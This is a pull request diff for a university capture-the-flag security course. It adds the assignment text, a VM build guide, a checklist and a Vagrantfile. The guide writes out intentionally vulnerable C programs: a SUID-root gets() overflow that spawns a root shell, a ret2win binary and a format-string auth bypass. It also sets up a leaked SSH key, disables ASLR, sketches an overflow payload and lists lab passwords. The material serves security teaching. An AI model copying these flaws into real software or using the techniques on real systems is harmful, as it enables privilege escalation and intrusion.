### PR TITLE
Refactor repo: add assignment/, infrastructure/, and solutions/ for student sharing

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,99 +1,47 @@
-# Networks & System Security
+# NSS A2 — CTF Assignment (SIL765 / COL7165)
 
-**SIL765 & COL7165 - Assignment 2**
-**Deadline:** February 22, 2026
+This repository accompanies the CTF assignment for **Networks & System Security (SIL765 / COL7165)**.
 
-## Instructions
+It is organised into three sections:
 
-- This assignment is a capture-the-flag problem.
-- You will be given one VirtualBox image of an Ubuntu Linux system.
-- There are five problem sets.
-- For each problem, you need to create a file in the stated format only.
-- A helper function has been written to create the text files in the correct format. You can use it to create the tarball for submission.
-- The VirtualBox 'appliance' is available at <https://owncloud.iitd.ac.in/nextcloud/index.php/s/ZiZZEpyK3dp7nC7>
-- Problems with the assignment should be raised as issues on the GitHub repository <https://github.com/boardslayer/CTF-SIL765>
+| Directory | Contents |
+|-----------|----------|
+| [`assignment/`](assignment/README.md) | The original student-facing assignment — five problems covering SSH key leakage, SUID privilege escalation, stack buffer overflows, a format-string vulnerability, and CSS hijacking. |
+| [`infrastructure/`](infrastructure/README.md) | How the assignment VM was constructed — the full build guide, Vagrant automation, and per-problem provisioning scripts with the vulnerable C source code. |
+| [`solutions/`](solutions/README.md) | Complete walkthrough for every problem (AArch64 and x86_64 variants), standalone exploit scripts for P3 and P4, and grading scripts used to verify submissions. |
 
-## Problem 1: Gain Access
+---
 
-You are a penetration tester tasked with checking the security of a deployment server. You have been made aware that not all users are following the security guidelines given to them. Try and find a way inside the system.
+## Quick Navigation
 
-**Goal:** Obtain an unprivileged shell. Extract the flag stored inside the home folder.
-**Hint:** Think of ways that information may leak on a public server. How does one connect to the server to work?
+### Assignment
+- [Problem statement](assignment/README.md)
 
-**Solution Format**
-Submit a single tarball named `[EntryNumber]-P1.tar.gz`, e.g., `2022CSZ228227-P1.tar.gz`. The file should contain `flag.txt` and `key.txt`.
+### Build (How It Was Made)
+- [VM build guide](infrastructure/README.md)
+- [VM creation checklist](infrastructure/VM_CHECKLIST.md)
+- [Vagrant automation](infrastructure/Vagrantfile)
+- Provisioning scripts: [P1](infrastructure/provision/p1/provision_p1.sh) · [P2](infrastructure/provision/p2/provision_p2.sh) · [P3](infrastructure/provision/p3/provision_p3.sh) · [P4](infrastructure/provision/p4/provision_p4.sh) · [P5](infrastructure/provision/p5/provision_p5.sh)
+- Vulnerable source: [p2.c](infrastructure/provision/p2/p2.c) · [p3.c](infrastructure/provision/p3/p3.c) · [p4.c](infrastructure/provision/p4/p4.c)
 
-```text
-[EntryNumber]-P1.tar.gz
-|-- flag.txt
-`-- key.txt
-```
+### Solutions
+- [Full walkthrough — AArch64](solutions/README.md)
+- [Full walkthrough — x86_64](solutions/README_x86.md)
+- [Flag extraction commands](solutions/FLAG_EXTRACTION.md)
+- Exploit scripts: [P3 ret2win](solutions/p3_exploit.py) · [P4 format-string](solutions/p4_exploit.py)
+- Grading scripts: [P1](solutions/grading/verify_p1.py) · [P3](solutions/grading/verify_p3.py) · [P4](solutions/grading/verify_p4.py) · [P5](solutions/grading/verify_p5.py)
 
-## Problem 2: Become Super
+---
 
-In your home folder you have three programs that you can execute. They are called `p4`, `p2`, and `p3`. You can run them, but you cannot modify them. Can you use them to gain root access?
+## Problem Overview
 
-**Goal:** Obtain a privileged (root) shell and extract the flag stored inside the root user's home directory. Once done you can use the helper function to create the text.
+| # | Title | Technique |
+|---|-------|-----------|
+| P1 | Gain Access | Information leakage → SSH key recovery |
+| P2 | Become Super | SUID-root binary, stack buffer overflow → root shell |
+| P3 | Changing the Flow | NX-enabled binary, ret2win (no shellcode) |
+| P4 | Is 'In and Out' Safe? | Format-string vulnerability, `%n` write to flip auth check |
+| P5 | CSS Hijacking | Attacker-controlled stylesheet reveals hidden flag |
 
-**Hint:** You are provided with several executable programs inside the vulnerable user's home directory. Can they be used somehow?
+Each problem builds on the previous: students must first gain unprivileged access (P1) before attempting the local exploitation problems (P2–P5).
 
-**Solution Format**
-Submit a single tarball named `[EntryNumber]-P2.tar.gz`, e.g., `2022CSZ228228-P2.tar.gz`. The file should contain `flag.txt` and `key.txt`.
-
-```text
-[EntryNumber]-P2.tar.gz
-|-- flag.txt
-`-- key.txt
-```
-
-## Problem 3: Changing the Flow
-
-In this problem, you are provided with a standalone program that processes user input and makes internal decisions based on it. While the program appears to function normally, subtle implementation flaws may allow an attacker to redirect its execution.
-
-**Goal:** Manipulate the program's execution flow to execute a target function already in the binary to obtain the protected flag.
-
-**Hint:** How do you _win_ a game of memory? Where do you write things temporarily when you run a program? Carefully analyze how the program stores and returns control during execution.
-
-**Solution Format**
-Submit a single tarball named `[EntryNumber]-P3.tar.gz`, e.g., `2022CSZ228229-P3.tar.gz`. The file should contain `flag.txt` and `key.txt`.
-
-```text
-[EntryNumber]-P3.tar.gz
-|-- flag.txt
-`-- key.txt
-```
-
-## Problem 4: Is 'In and Out' Safe?
-
-In the previous problem, you redirected execution by corrupting control data. Is there another way of redirecting execution without modifying control data?
-
-**Goal:** Exploit some input vulnerability to obtain a protected flag.
-
-**Hint:** Output functions may interpret user input in unexpected ways. Consider how formatted output functions process arguments internally.
-
-**Solution Format**
-Submit a single tarball named `[EntryNumber]-P4.tar.gz`, e.g., `2022CSZ228230-P4.tar.gz`. The file should contain `flag.txt` and `key.txt`.
-
-```text
-[EntryNumber]-P4.tar.gz
-|-- flag.txt
-`-- key.txt
-```
-
-## Problem 5: CSS Hijacking
-
-In this problem, you are given a local web application running at <http://localhost:5005>. Gain access to the admin page and find the hidden flag. The user account you have access to is `ctfadmin` with password same as the username.
-
-**Goal:** Use CSS hijacking to reveal the `ctfadmin` flag.
-
-**Hint:** The admin page loads a user‑supplied stylesheet. Look for ways CSS can change visibility or style of hidden elements.
-**Access:** Connect via VNC (host port `5901`) and open Epiphany (`epiphany-browser`) in the VM.
-
-**Solution Format**
-Submit a single tarball named `[EntryNumber]-P5.tar.gz`, e.g., `2022CSZ228231-P5.tar.gz`. The file should contain `flag.txt` and `key.txt`.
-
-```text
-[EntryNumber]-P5.tar.gz
-|-- flag.txt
-`-- key.txt
-```

--- a/assignment/README.md
+++ b/assignment/README.md
@@ -1,0 +1,99 @@
+# Networks & System Security
+
+**SIL765 & COL7165 - Assignment 2**
+**Deadline:** February 22, 2026
+
+## Instructions
+
+- This assignment is a capture-the-flag problem.
+- You will be given one VirtualBox image of an Ubuntu Linux system.
+- There are five problem sets.
+- For each problem, you need to create a file in the stated format only.
+- A helper function has been written to create the text files in the correct format. You can use it to create the tarball for submission.
+- The VirtualBox 'appliance' is available at <https://owncloud.iitd.ac.in/nextcloud/index.php/s/ZiZZEpyK3dp7nC7>
+- Problems with the assignment should be raised as issues on the GitHub repository <https://github.com/boardslayer/CTF-SIL765>
+
+## Problem 1: Gain Access
+
+You are a penetration tester tasked with checking the security of a deployment server. You have been made aware that not all users are following the security guidelines given to them. Try and find a way inside the system.
+
+**Goal:** Obtain an unprivileged shell. Extract the flag stored inside the home folder.
+**Hint:** Think of ways that information may leak on a public server. How does one connect to the server to work?
+
+**Solution Format**
+Submit a single tarball named `[EntryNumber]-P1.tar.gz`, e.g., `2022CSZ228227-P1.tar.gz`. The file should contain `flag.txt` and `key.txt`.
+
+```text
+[EntryNumber]-P1.tar.gz
+|-- flag.txt
+`-- key.txt
+```
+
+## Problem 2: Become Super
+
+In your home folder you have three programs that you can execute. They are called `p4`, `p2`, and `p3`. You can run them, but you cannot modify them. Can you use them to gain root access?
+
+**Goal:** Obtain a privileged (root) shell and extract the flag stored inside the root user's home directory. Once done you can use the helper function to create the text.
+
+**Hint:** You are provided with several executable programs inside the vulnerable user's home directory. Can they be used somehow?
+
+**Solution Format**
+Submit a single tarball named `[EntryNumber]-P2.tar.gz`, e.g., `2022CSZ228228-P2.tar.gz`. The file should contain `flag.txt` and `key.txt`.
+
+```text
+[EntryNumber]-P2.tar.gz
+|-- flag.txt
+`-- key.txt
+```
+
+## Problem 3: Changing the Flow
+
+In this problem, you are provided with a standalone program that processes user input and makes internal decisions based on it. While the program appears to function normally, subtle implementation flaws may allow an attacker to redirect its execution.
+
+**Goal:** Manipulate the program's execution flow to execute a target function already in the binary to obtain the protected flag.
+
+**Hint:** How do you _win_ a game of memory? Where do you write things temporarily when you run a program? Carefully analyze how the program stores and returns control during execution.
+
+**Solution Format**
+Submit a single tarball named `[EntryNumber]-P3.tar.gz`, e.g., `2022CSZ228229-P3.tar.gz`. The file should contain `flag.txt` and `key.txt`.
+
+```text
+[EntryNumber]-P3.tar.gz
+|-- flag.txt
+`-- key.txt
+```
+
+## Problem 4: Is 'In and Out' Safe?
+
+In the previous problem, you redirected execution by corrupting control data. Is there another way of redirecting execution without modifying control data?
+
+**Goal:** Exploit some input vulnerability to obtain a protected flag.
+
+**Hint:** Output functions may interpret user input in unexpected ways. Consider how formatted output functions process arguments internally.
+
+**Solution Format**
+Submit a single tarball named `[EntryNumber]-P4.tar.gz`, e.g., `2022CSZ228230-P4.tar.gz`. The file should contain `flag.txt` and `key.txt`.
+
+```text
+[EntryNumber]-P4.tar.gz
+|-- flag.txt
+`-- key.txt
+```
+
+## Problem 5: CSS Hijacking
+
+In this problem, you are given a local web application running at <http://localhost:5005>. Gain access to the admin page and find the hidden flag. The user account you have access to is `ctfadmin` with password same as the username.
+
+**Goal:** Use CSS hijacking to reveal the `ctfadmin` flag.
+
+**Hint:** The admin page loads a user‑supplied stylesheet. Look for ways CSS can change visibility or style of hidden elements.
+**Access:** Connect via VNC (host port `5901`) and open Epiphany (`epiphany-browser`) in the VM.
+
+**Solution Format**
+Submit a single tarball named `[EntryNumber]-P5.tar.gz`, e.g., `2022CSZ228231-P5.tar.gz`. The file should contain `flag.txt` and `key.txt`.
+
+```text
+[EntryNumber]-P5.tar.gz
+|-- flag.txt
+`-- key.txt
+```

--- a/infrastructure/README.md
+++ b/infrastructure/README.md
@@ -1,0 +1,516 @@
+# NSS A2 Single-VM CTF Build Guide (Ubuntu Server + VirtualBox)
+
+This document is a comprehensive, step-by-step build guide for a single Ubuntu VM image that supports all five problems (P1–P5) in the assignment. It is written so you can reproduce the VM on an ARM64 host now and replicate on AMD64 later.
+
+Important instructor note satisfied:
+- All flags depend on a per-boot key stored in the P1 user’s profile.
+- The key is regenerated on every VM reboot.
+- Students are instructed to re-extract flag files each time they decide on a solution.
+
+The guidance below is split into:
+1. VM creation and OS install
+2. Base system configuration
+3. Flag and keying system
+4. Problem-specific setup (P1–P5)
+5. Validation checklist
+6. Student-facing run notes
+
+---
+
+## 1) VM Creation and OS Install (VirtualBox)
+
+### 1.1 Create VM
+Use VirtualBox to create a new VM:
+- Name: `NSS-A2-CTF`
+- Type: `Linux`
+- Version: `Ubuntu (64-bit)`
+- RAM: `2–4 GB`
+- CPU: `2 cores`
+- Disk: `20 GB` (VDI, dynamically allocated)
+- vagrant password changed to 'vagrantpassword' for instructor testing
+
+Network:
+- Adapter 1: NAT
+- Port forwarding:
+  - Host 2222 -> Guest 22 (SSH)
+  - Host 8000 -> Guest 80 (HTTP)
+  - Optional decoy forwards (not used by services):
+    - Host 9001 -> Guest 9001
+    - Host 9002 -> Guest 9002
+
+### 1.2 Attach ISO
+Attach the provided ISO:
+- `ubuntu-22.04.5-live-server-arm64.iso`
+
+Note: This is ARM64-only. Use the AMD64 ISO later when you replicate on Intel/AMD hosts.
+
+### 1.3 Install Ubuntu Server
+During install:
+- Create user `ctfadmin`
+- Enable OpenSSH server
+- Skip snaps if you prefer minimal base
+
+After install, update and install base packages:
+```bash
+sudo apt update
+sudo apt -y upgrade
+sudo apt -y install openssh-server nginx build-essential gdb python3 python3-pip net-tools socat \
+  python3 python3-venv python3-pip \
+  xfce4 xfce4-goodies tigervnc-standalone-server tigervnc-common \
+  dbus-x11 xterm epiphany-browser
+```
+
+---
+
+## 2) Base System Configuration
+
+### 2.1 Create Users
+Create the main vulnerable user (P1) and problem flag users:
+```bash
+sudo useradd -m -s /bin/bash p1
+sudo useradd -m -s /bin/bash p3flag
+sudo useradd -m -s /bin/bash p4flag
+```
+Set passwords (choose simple ones for instructor testing; students will not be told):
+```bash
+sudo passwd p1
+sudo passwd p3flag
+sudo passwd p4flag
+```
+
+### 2.2 SSH
+Ensure SSH is enabled and running:
+```bash
+sudo systemctl enable ssh
+sudo systemctl restart ssh
+```
+
+### 2.3 Disable ASLR (for P4)
+Create a sysctl override:
+```bash
+echo 'kernel.randomize_va_space=0' | sudo tee /etc/sysctl.d/01-disable-aslr.conf
+sudo sysctl -p /etc/sysctl.d/01-disable-aslr.conf
+```
+
+---
+
+## 3) Flag and Keying System (Per-Boot Key)
+
+We store a per-boot secret key in `/home/p1/.keys/boot.key`. A boot-time service regenerates it and uses it to derive flags for P1–P5, then writes those flags into protected locations (with correct permissions).
+
+### 3.1 Boot Key and Flag Generator Script
+Create a script that runs on boot:
+```bash
+sudo mkdir -p /opt/ctf
+sudo tee /opt/ctf/boot-keygen.sh > /dev/null <<'SH'
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Generate per-boot key for P1 user
+install -d -m 700 -o p1 -g p1 /home/p1/.keys
+KEY_FILE=/home/p1/.keys/boot.key
+head -c 32 /dev/urandom | base64 > "$KEY_FILE"
+chown p1:p1 "$KEY_FILE"
+chmod 600 "$KEY_FILE"
+
+# Clear per-boot solved markers
+rm -f /opt/p3/solved /opt/p4/solved /opt/p5/solved 2>/dev/null || true
+
+# Derive flags using the per-boot key
+KEY=$(cat "$KEY_FILE")
+FLAG_P1=$(printf '%s' "P1:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P2=$(printf '%s' "P2:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P3=$(printf '%s' "P3:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P4=$(printf '%s' "P4:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P5=$(printf '%s' "P5:$KEY" | sha256sum | awk '{print $1}')
+
+# Write flags to protected locations
+# P1 flag in p1 home (readable by p1)
+install -d -m 700 -o p1 -g p1 /home/p1/flags
+printf '%s\n' "$FLAG_P1" > /home/p1/flags/flag_p1.txt
+chown p1:p1 /home/p1/flags/flag_p1.txt
+chmod 600 /home/p1/flags/flag_p1.txt
+
+# P2 flag in root home (readable by root)
+printf '%s\n' "$FLAG_P2" > /root/flag_p2.txt
+chmod 600 /root/flag_p2.txt
+
+# P3 flag owned by p3flag
+install -d -m 700 -o p3flag -g p3flag /opt/p3
+printf '%s\n' "$FLAG_P3" > /opt/p3/flag_p3.txt
+chown p3flag:p3flag /opt/p3/flag_p3.txt
+chmod 600 /opt/p3/flag_p3.txt
+
+# P4 flag owned by p4flag
+install -d -m 700 -o p4flag -g p4flag /opt/p4
+printf '%s\n' "$FLAG_P4" > /opt/p4/flag_p4.txt
+chown p4flag:p4flag /opt/p4/flag_p4.txt
+chmod 600 /opt/p4/flag_p4.txt
+
+# P5 flag owned by ctfadmin
+install -d -m 700 -o ctfadmin -g ctfadmin /home/ctfadmin/flags
+printf '%s\n' "$FLAG_P5" > /home/ctfadmin/flags/flag_p5.txt
+chown ctfadmin:ctfadmin /home/ctfadmin/flags/flag_p5.txt
+chmod 600 /home/ctfadmin/flags/flag_p5.txt
+SH
+
+sudo chmod 750 /opt/ctf/boot-keygen.sh
+sudo chown root:root /opt/ctf/boot-keygen.sh
+```
+
+### 3.2 Systemd Service
+Create a systemd unit to run at boot:
+```bash
+sudo tee /etc/systemd/system/ctf-bootkey.service > /dev/null <<'UNIT'
+[Unit]
+Description=CTF per-boot key and flag generator
+After=network.target
+
+[Service]
+Type=oneshot
+ExecStart=/opt/ctf/boot-keygen.sh
+
+[Install]
+WantedBy=multi-user.target
+UNIT
+
+sudo systemctl enable ctf-bootkey.service
+sudo systemctl start ctf-bootkey.service
+```
+
+### 3.3 Extraction Helper (Student-Facing)
+Provide a helper that creates `flag.txt` and `key.txt` once the user has the required access. The helper will fail if the user does not have permission to read the protected flag file.
+
+```bash
+sudo tee /usr/local/bin/ctf-extract > /dev/null <<'SH'
+#!/usr/bin/env bash
+set -euo pipefail
+
+if [[ $# -ne 1 ]]; then
+  echo "Usage: ctf-extract P1|P2|P3|P4|P5"
+  exit 1
+fi
+
+PROBLEM="$1"
+KEY_FILE=/home/p1/.keys/boot.key
+
+if [[ ! -r "$KEY_FILE" ]]; then
+  echo "[!] Cannot read key file. You need P1 access."
+  exit 1
+fi
+
+KEY=$(cat "$KEY_FILE")
+
+FLAG_PATH=""
+case "$PROBLEM" in
+  P1) FLAG_PATH=/home/p1/flags/flag_p1.txt ;;
+  P2) FLAG_PATH=/root/flag_p2.txt ;;
+  P3) FLAG_PATH=/opt/p3/flag_p3.txt ;;
+  P4) FLAG_PATH=/opt/p4/flag_p4.txt ;;
+  P5) FLAG_PATH=/home/ctfadmin/flags/flag_p5.txt ;;
+  *) echo "Invalid problem"; exit 1 ;;
+esac
+
+if [[ ! -r "$FLAG_PATH" ]]; then
+  echo "[!] Cannot read flag. You do not yet have required access."
+  exit 1
+fi
+
+cat > flag.txt <<EOF
+$(cat "$FLAG_PATH")
+EOF
+
+cat > key.txt <<EOF
+$KEY
+EOF
+
+echo "Wrote flag.txt, key.txt"
+SH
+
+sudo chmod 755 /usr/local/bin/ctf-extract
+sudo chown root:root /usr/local/bin/ctf-extract
+```
+
+Instructor note: Students should run `ctf-extract P1|P2|P3|P4|P5` after solving each problem. Because keys are per-boot, they must extract again after every reboot.
+
+---
+
+## 4) Problem Setup
+
+### P1: Gain Access (Info Leak -> SSH)
+Goal: Obtain unprivileged shell as `p1` and read `/home/p1/flags/flag_p1.txt`.
+
+#### P1 Setup
+1. Create SSH key pair for `p1`:
+```bash
+sudo -u p1 ssh-keygen -t rsa -b 2048 -f /home/p1/.ssh/id_rsa -N ""
+```
+2. Add public key to authorized_keys:
+```bash
+sudo -u p1 bash -c 'cat /home/p1/.ssh/id_rsa.pub >> /home/p1/.ssh/authorized_keys'
+sudo chmod 600 /home/p1/.ssh/authorized_keys
+```
+3. Leak private key via web server (misconfiguration):
+```bash
+sudo mkdir -p /var/www/html/backup
+sudo cp /home/p1/.ssh/id_rsa /var/www/html/backup/id_rsa
+sudo chmod 644 /var/www/html/backup/id_rsa
+```
+4. Ensure nginx is running:
+```bash
+sudo systemctl enable nginx
+sudo systemctl restart nginx
+```
+
+Student attack path:
+- Discover leaked private key at `http://<host>:8000/backup/id_rsa`
+- Use it to SSH into the VM as `p1`
+
+### P2: Become Super (SUID Root Buffer Overflow)
+Goal: Exploit a local buffer overflow in a SUID-root binary to get root, then read `/root/flag_p2.txt`.
+
+#### P2 Binary
+Create vulnerable program:
+```bash
+sudo mkdir -p /home/p1/p2
+sudo tee /home/p1/p2/p2.c > /dev/null <<'C'
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+void win() {
+    setuid(0);
+    setgid(0);
+    system("/bin/sh");
+}
+
+void vuln() {
+    char buf[64];
+    puts("Enter input:");
+    gets(buf);
+}
+
+int main() {
+    vuln();
+    return 0;
+}
+C
+
+sudo gcc -fno-stack-protector -z execstack -no-pie -o /home/p1/p2/p2 /home/p1/p2/p2.c
+sudo chown root:root /home/p1/p2/p2
+sudo chmod 4755 /home/p1/p2/p2
+```
+
+### P3: Changing the Flow (NX, Ret2Win)
+Goal: Redirect execution to `win()` and print `/opt/p3/flag_p3.txt`.
+
+#### P3 Binary
+```bash
+sudo mkdir -p /home/p1/p3
+sudo tee /home/p1/p3/p3.c > /dev/null <<'C'
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void mark_solved(void) {
+    FILE *f = fopen("/opt/p3/solved", "w");
+    if (f) {
+        fputs("ok\n", f);
+        fclose(f);
+    }
+}
+
+void win() {
+    FILE *f = fopen("/opt/p3/flag_p3.txt", "r");
+    if (!f) {
+        puts("No flag");
+        exit(1);
+    }
+    char flag[128];
+    fgets(flag, sizeof(flag), f);
+    printf("FLAG: %s\n", flag);
+    fclose(f);
+    mark_solved();
+    exit(0);
+}
+
+void vuln() {
+    char buf[64];
+    puts("Say something:");
+    gets(buf);
+}
+
+int main() {
+    vuln();
+    return 0;
+}
+C
+
+sudo gcc -fno-stack-protector -no-pie -z noexecstack -o /home/p1/p3/p3 /home/p1/p3/p3.c
+sudo chown p3flag:p3flag /home/p1/p3/p3
+sudo chmod 4755 /home/p1/p3/p3
+```
+
+### P4: Format String (Auth Gate)
+Goal: Use a format-string bug to flip an auth check and trigger `win()` to print `/opt/p4/flag_p4.txt`.
+
+#### P4 Binary
+```bash
+sudo mkdir -p /home/p1/p4
+sudo tee /home/p1/p4/p4.c > /dev/null <<'C'
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void win(void) {
+    FILE *f = fopen("/opt/p4/flag_p4.txt", "r");
+    if (!f) {
+        puts("No flag");
+        exit(1);
+    }
+    char flag[128];
+    if (fgets(flag, sizeof(flag), f) != NULL) {
+        printf("FLAG: %s\n", flag);
+    } else {
+        puts("No flag");
+    }
+    fclose(f);
+    FILE *s = fopen("/opt/p4/solved", "w");
+    if (s) {
+        fputs("ok\n", s);
+        fclose(s);
+    }
+    exit(0);
+}
+
+void safe(void) {
+    puts("Nope.");
+}
+
+void (*fp)(void) = safe;
+
+void vuln(void) {
+    char buf[128];
+    int auth = 0;
+    int dummy = 0;
+    puts("Input:");
+    if (!fgets(buf, sizeof(buf), stdin)) {
+        return;
+    }
+    printf(buf, &auth, dummy);
+    if (auth == 0x1337) {
+        fp = win;
+    }
+    fp();
+}
+
+int main(void) {
+    setbuf(stdout, NULL);
+    setbuf(stderr, NULL);
+    setgid(getegid());
+    setuid(geteuid());
+    vuln();
+    return 0;
+}
+C
+
+sudo gcc -fno-stack-protector -no-pie -z noexecstack -o /home/p1/p4/p4 /home/p1/p4/p4.c
+sudo chown p4flag:p4flag /home/p1/p4/p4
+sudo chmod 4755 /home/p1/p4/p4
+sudo rm -f /home/p1/p4/p4.c
+```
+
+### P5: CSS Hijacking (Epiphany + VNC)
+Goal: Use CSS to reveal a hidden flag on the admin page and submit it.
+
+#### P5 Server (runs on localhost)
+- Server: `http://127.0.0.1:5005`
+- Admin page: `http://127.0.0.1:5005/admin`
+- CSS upload: `http://127.0.0.1:5005/submit`
+
+#### P5 Setup Notes
+- VNC server runs on `:1` (host port `5901`).
+- Epiphany (`epiphany-browser`) is used for in‑VM browsing.
+- The P5 flag is stored at `/home/ctfadmin/flags/flag_p5.txt` and injected into the admin page.
+- VNC password is `ctfadmin` (change if desired).
+
+## 5) Validation Checklist
+
+Run these checks:
+```bash
+# P1
+curl http://localhost:8000/backup/id_rsa
+ssh -i /tmp/id_rsa -p 2222 p1@localhost
+
+# P2
+ls -l /home/p1/p2/p2  # should be rwsr-xr-x root root
+file /home/p1/p2/p2   # should be ELF 64-bit, not PIE
+```
+
+Quick P2 exploit sanity check (as p1):
+```bash
+# Get win() address
+nm -n /home/p1/p2/p2 | rg " win$"
+# Then craft payload (offset may be 72 on x86_64):
+# python3 -c 'print("A"*72 + "<addr>")' | /home/p1/p2/p2
+```
+Continue checks:
+```bash
+
+# P3
+ls -l /home/p1/p3/p3  # should be rwsr-xr-x p3flag p3flag
+
+# P4
+ls -l /home/p1/p4/p4  # should be rwsr-xr-x p4flag p4flag
+
+# Flags
+sudo cat /root/flag_p2.txt
+sudo -u p1 cat /home/p1/flags/flag_p1.txt
+sudo -u p3flag cat /opt/p3/flag_p3.txt
+sudo -u p4flag cat /opt/p4/flag_p4.txt
+```
+
+Test `ctf-extract`:
+```bash
+# As p1 (should succeed for P1 only)
+ctf-extract P1
+
+# As root (should succeed for P2)
+sudo ctf-extract P2
+```
+
+---
+
+## 6) Student-Facing Run Notes (Include in Assignment)
+
+- VM runs on VirtualBox.
+- Use NAT and connect over SSH (host port 2222 -> guest 22).
+- P1: Find leaked SSH private key from web server, then SSH into VM.
+- P2–P5: Use local exploitation on provided binaries/services.
+- Flags change on every reboot. Run `ctf-extract P1|P2|P3|P4|P5` after solving each problem.
+
+Submission (tar available, zip not required):
+```bash
+tar -czf 2022CSZ123456-P1.tar.gz flag.txt key.txt
+```
+
+Copy submission to host (from host terminal):
+```bash
+scp -P 2222 p1@localhost:/home/p1/2022CSZ123456-P1.tar.gz .
+```
+
+---
+
+## 7) AMD64 Replication Notes
+
+When you rebuild this VM for Intel/AMD hosts:
+- Use the `ubuntu-22.04.5-live-server-amd64.iso` ISO instead.
+- Repeat the exact configuration steps from this guide.
+
+---
+
+## 8) Security and Quality Notes (Instructor)
+
+- These binaries are intentionally unsafe.
+- Keep this VM isolated and do not expose it on public networks.
+- Consider snapshotting the VM after setup.

--- a/infrastructure/VM_CHECKLIST.md
+++ b/infrastructure/VM_CHECKLIST.md
@@ -1,0 +1,68 @@
+# VM Creation + Base Install Checklist (NSS A2)
+
+Use this checklist to create the VM and prepare it for the P1 provisioning step.
+
+## 1) Create the VM (VirtualBox)
+- [x] Create new VM `NSS-A2-CTF`
+- [x] Type: Linux, Version: Ubuntu (64-bit)
+- [x] RAM: 2-4 GB
+- [x] CPU: 2 cores
+- [x] Disk: 20 GB (VDI, dynamic)
+
+## 2) Configure Network
+- [x] Adapter 1: NAT
+- [x] Port forwards:
+- [x] Host 2222 -> Guest 22 (SSH)
+- [x] Host 8000 -> Guest 80 (HTTP)
+- [x] Host 5901 -> Guest 5901 (VNC for P5)
+- [x] Optional decoy forwards:
+- [x] Host 9001 -> Guest 9001
+- [x] Host 9002 -> Guest 9002
+
+## 3) Attach ISO and Install OS
+- [x] Attach `ubuntu-22.04.5-live-server-arm64.iso`
+- [x] Install Ubuntu Server 22.04
+- [x] Create user `ctfadmin`, password `thisisastrongpassword`
+- [x] Enable OpenSSH server
+- [x] Complete install and reboot
+
+## 4) Base Package Install (inside VM)
+Run (skip `apt update/upgrade` if you want to avoid updating existing software):
+```bash
+sudo apt update
+sudo apt -y upgrade
+sudo apt -y install openssh-server nginx build-essential gdb python3 python3-pip net-tools socat
+```
+
+## 5) Copy Provision Script into VM
+- [ ] Copy `p1/provision_p1.sh` into VM (e.g., via `scp` or shared folder)
+
+Example from host:
+```bash
+scp -P 2222 p1/provision_p1.sh ctfadmin@localhost:/home/ctfadmin/
+```
+
+## 6) Run P1 Provisioning Script
+Inside VM:
+```bash
+sudo bash /home/ctfadmin/provision_p1.sh
+```
+
+## 7) Quick Verification
+From host:
+```bash
+curl http://localhost:8000/backup/id_rsa
+```
+Inside VM:
+```bash
+sudo systemctl status nginx
+sudo systemctl status ssh
+```
+
+---
+
+When complete, tell me and we'll move on to P2-P4 setup.
+
+P5 notes:
+- VNC server runs on `:1` (host port 5901)
+- P5 web app runs on `http://127.0.0.1:5005` inside the VM

--- a/infrastructure/Vagrantfile
+++ b/infrastructure/Vagrantfile
@@ -82,9 +82,9 @@ Vagrant.configure("2") do |config|
   #   apt-get update
   #   apt-get install -y apache2
   # SHELL
-  config.vm.provision "shell", path: "p1/provision_p1.sh"
-  config.vm.provision "shell", path: "p2/provision_p2.sh"
-  config.vm.provision "shell", path: "p3/provision_p3.sh"
-  config.vm.provision "shell", path: "p4/provision_p4.sh"
-  config.vm.provision "shell", path: "p5/provision_p5.sh"
+  config.vm.provision "shell", path: "provision/p1/provision_p1.sh"
+  config.vm.provision "shell", path: "provision/p2/provision_p2.sh"
+  config.vm.provision "shell", path: "provision/p3/provision_p3.sh"
+  config.vm.provision "shell", path: "provision/p4/provision_p4.sh"
+  config.vm.provision "shell", path: "provision/p5/provision_p5.sh"
 end

--- a/infrastructure/Vagrantfile
+++ b/infrastructure/Vagrantfile
@@ -1,0 +1,90 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure("2") do |config|
+  # The most common configuration options are documented and commented below.
+  # For a complete reference, please see the online documentation at
+  # https://docs.vagrantup.com.
+
+  # Every Vagrant development environment requires a box. You can search for
+  # boxes at https://vagrantcloud.com/search.
+  config.vm.box = "bento/ubuntu-22.04"
+  config.vm.box_version = "202510.26.0"
+
+  # Disable automatic box update checking. If you disable this, then
+  # boxes will only be checked for updates when the user runs
+  # `vagrant box outdated`. This is not recommended.
+  # config.vm.box_check_update = false
+
+  # Create a forwarded port mapping which allows access to a specific port
+  # within the machine from a port on the host machine. In the example below,
+  # accessing "localhost:8080" will access port 80 on the guest machine.
+  # NOTE: This will enable public access to the opened port
+  # config.vm.network "forwarded_port", guest: 80, host: 8080
+
+  # Create a forwarded port mapping which allows access to a specific port
+  # within the machine from a port on the host machine and only allow access
+  # via 127.0.0.1 to disable public access
+  # config.vm.network "forwarded_port", guest: 80, host: 8080, host_ip: "127.0.0.1"
+  config.vm.network "forwarded_port", guest: 80, host: 8000
+  config.vm.network "forwarded_port", guest: 85, host: 8085
+  config.vm.network "forwarded_port", guest: 5901, host: 5901
+  # Decoy ports
+  config.vm.network "forwarded_port", guest: 9001, host: 9001
+  config.vm.network "forwarded_port", guest: 9002, host: 9002
+
+  # Create a private network, which allows host-only access to the machine
+  # using a specific IP.
+  # config.vm.network "private_network", ip: "192.168.33.10"
+
+  # Create a public network, which generally matched to bridged network.
+  # Bridged networks make the machine appear as another physical device on
+  # your network.
+  # config.vm.network "public_network"
+
+  # Share an additional folder to the guest VM. The first argument is
+  # the path on the host to the actual folder. The second argument is
+  # the path on the guest to mount the folder. And the optional third
+  # argument is a set of non-required options.
+  # config.vm.synced_folder "../data", "/vagrant_data"
+  # config.vm.synced_folder ".", "/vagrant", disabled: true
+
+  # Disable the default share of the current code directory. Doing this
+  # provides improved isolation between the vagrant box and your host
